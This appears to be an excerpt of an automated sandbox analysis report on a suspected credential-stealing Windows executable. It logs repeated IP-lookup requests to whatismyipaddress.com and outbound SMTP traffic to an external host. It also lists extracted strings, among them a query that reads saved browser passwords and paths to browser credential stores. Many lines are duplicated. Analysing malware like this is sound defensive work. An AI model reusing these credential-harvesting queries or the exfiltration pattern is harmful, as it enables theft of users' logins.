                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: global trafficTCP traffic: 192.168.2.4:49750 -> 166.62.27.57:587
                    Source: global trafficTCP traffic: 192.168.2.4:49750 -> 166.62.27.57:587
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 104.16.154.36 104.16.154.36
                    Source: Joe Sandbox ViewIP Address: 104.16.154.36 104.16.154.36
                    Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
                    Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
                    Source: global trafficTCP traffic: 192.168.2.4:49750 -> 166.62.27.57:587
                    Source: global trafficTCP traffic: 192.168.2.4:49750 -> 166.62.27.57:587
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, INQUIRY.exe, 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp, vbc.exe, 00000006.00000002.695692485.0000000000400000.00000040.00000001.sdmp, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, INQUIRY.exe, 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp, vbc.exe, 00000006.00000002.695692485.0000000000400000.00000040.00000001.sdmp, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                    Source: INQUIRY.exe, vbc.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                    Source: vbc.exe, 00000006.00000002.696465332.000000000084E000.00000004.00000040.sdmp, vbc.exe, 00000014.00000002.775214194.0000000000A2E000.00000004.00000040.sdmpString found in binary or memory: ttps://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?gws_rd%3Dssl&if=1&m=0&pc=s&wp=-1&gl=GB&uxe=4421591https://consent.google.com/about:blankhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094152711;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094152711;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fres://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=3&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fhttps://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.google.com&gl=GB&pc=s&uxe=4421591 equals www.facebook.com (Facebook)
                    Source: vbc.exe, 00000006.00000002.696465332.000000000084E000.00000004.00000040.sdmp, vbc.exe, 00000014.00000002.775214194.0000000000A2E000.00000004.00000040.sdmpString found in binary or memory: ttps://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?gws_rd%3Dssl&if=1&m=0&pc=s&wp=-1&gl=GB&uxe=4421591https://consent.google.com/about:blankhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094152711;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094152711;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fres://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=3&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fhttps://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.google.com&gl=GB&pc=s&uxe=4421591 equals www.yahoo.com (Yahoo)
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, INQUIRY.exe, 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp, vbc.exe, 00000006.00000002.695692485.0000000000400000.00000040.00000001.sdmp, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, INQUIRY.exe, 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp, vbc.exe, 00000006.00000002.695692485.0000000000400000.00000040.00000001.sdmp, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                    Source: INQUIRY.exe, vbc.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                    Source: vbc.exe, 00000006.00000002.696465332.000000000084E000.00000004.00000040.sdmp, vbc.exe, 00000014.00000002.775214194.0000000000A2E000.00000004.00000040.sdmpString found in binary or memory: ttps://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?gws_rd%3Dssl&if=1&m=0&pc=s&wp=-1&gl=GB&uxe=4421591https://consent.google.com/about:blankhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094152711;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094152711;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fres://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=3&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fhttps://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.google.com&gl=GB&pc=s&uxe=4421591 equals www.facebook.com (Facebook)
                    Source: vbc.exe, 00000006.00000002.696465332.000000000084E000.00000004.00000040.sdmp, vbc.exe, 00000014.00000002.775214194.0000000000A2E000.00000004.00000040.sdmpString found in binary or memory: ttps://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?gws_rd%3Dssl&if=1&m=0&pc=s&wp=-1&gl=GB&uxe=4421591https://consent.google.com/about:blankhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094152711;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094152711;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fres://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=3&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fhttps://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.google.com&gl=GB&pc=s&uxe=4421591 equals www.yahoo.com (Yahoo)
                    Source: unknownDNS traffic detected: queries for: 121.205.6.0.in-addr.arpa
                    Source: unknownDNS traffic detected: queries for: 121.205.6.0.in-addr.arpa
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, INQUIRY.exe, 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
                    Source: INQUIRY.exe, 00000001.00000003.656578776.0000000004FED000.00000004.00000001.sdmpString found in binary or memory: http://en.w
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                    Source: INQUIRY.exe, 00000010.00000002.825594692.0000000000852000.00000004.00000020.sdmpString found in binary or memory: http://go.microsoft.
                    Source: INQUIRY.exe, 00000010.00000002.825594692.0000000000852000.00000004.00000020.sdmpString found in binary or memory: http://go.microsoft.LinkId=42127
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, INQUIRY.exe, 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: INQUIRY.exe, 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpString found in binary or memory: http://whatismyipaddress.com
                    Source: INQUIRY.exe, INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpString found in binary or memory: http://whatismyipaddress.com/
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, INQUIRY.exe, 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpString found in binary or memory: http://whatismyipaddress.com/-
                    Source: INQUIRY.exe, 00000001.00000003.659052456.0000000005013000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.659667033.0000000005016000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: INQUIRY.exe, 00000001.00000003.659667033.0000000005016000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.661195055.0000000005011000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
                    Source: INQUIRY.exe, 00000001.00000003.659571445.0000000005016000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com$p
                    Source: INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com0p
                    Source: INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comMic
                    Source: INQUIRY.exe, 00000001.00000003.661005611.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comTC
                    Source: INQUIRY.exe, 00000001.00000003.660146058.0000000004FEC000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comTC(
                    Source: INQUIRY.exe, 00000001.00000003.660146058.0000000004FEC000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comTCE
                    Source: INQUIRY.exe, 00000001.00000003.660352640.0000000005011000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comandh
                    Source: INQUIRY.exe, 00000001.00000003.659772843.0000000005016000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comits
                    Source: INQUIRY.exe, 00000001.00000003.659772843.0000000005016000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: INQUIRY.exe, 00000001.00000003.660352640.0000000005011000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comle
                    Source: INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.660006267.0000000004FF6000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comn
                    Source: INQUIRY.exe, 00000001.00000003.660146058.0000000004FEC000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.como.
                    Source: INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comsm
                    Source: INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comtig
                    Source: INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: INQUIRY.exe, 00000001.00000003.664630621.000000000501B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: INQUIRY.exe, 00000001.00000003.664546236.0000000005011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlu
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: INQUIRY.exe, 00000001.00000003.662998950.0000000005011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersd
                    Source: INQUIRY.exe, 00000001.00000003.663957016.0000000005016000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designershq
